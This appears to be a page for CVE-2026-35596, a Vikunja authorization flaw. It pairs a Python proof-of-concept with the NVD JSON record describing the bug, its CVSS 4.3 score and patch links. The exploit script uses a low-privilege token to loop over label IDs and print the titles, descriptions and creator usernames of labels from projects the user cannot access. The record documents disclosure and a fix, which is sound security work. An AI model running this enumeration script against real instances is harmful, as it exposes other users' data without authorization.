CVE-2026-35596

import requests # Exploit for CVE-2026-35596 # Description: PoC to demonstrate information disclosure via SQL operator precedence. # Requires: Valid authentication token (low-privilege user). target_url = "http://localhost:3456/api/v1/labels" auth_token = "YOUR_LOW_PRIVILEGE_TOKEN_HERE" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Enumerate potential label IDs. # In a real scenario, an attacker might guess IDs or use a specific endpoint to list them if available. # The vulnerability allows reading details of labels associated with tasks visible to the user, # even if the user does not have access to the project the label belongs to. for label_id in range(1, 100): response = requests.get(f"{target_url}/{label_id}", headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Label ID {label_id} accessed:") print(f" Title: {data.get('title')}") print(f" Description: {data.get('description')}") print(f" Created By: {data.get('created_by').get('username')}") elif response.status_code == 404: continue else: print(f"[-] Error accessing ID {label_id}: {response.status_code}")

{"cve": {"id": "CVE-2026-35596", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.067", "lastModified": "2026-04-17T22:00:03.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2578", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}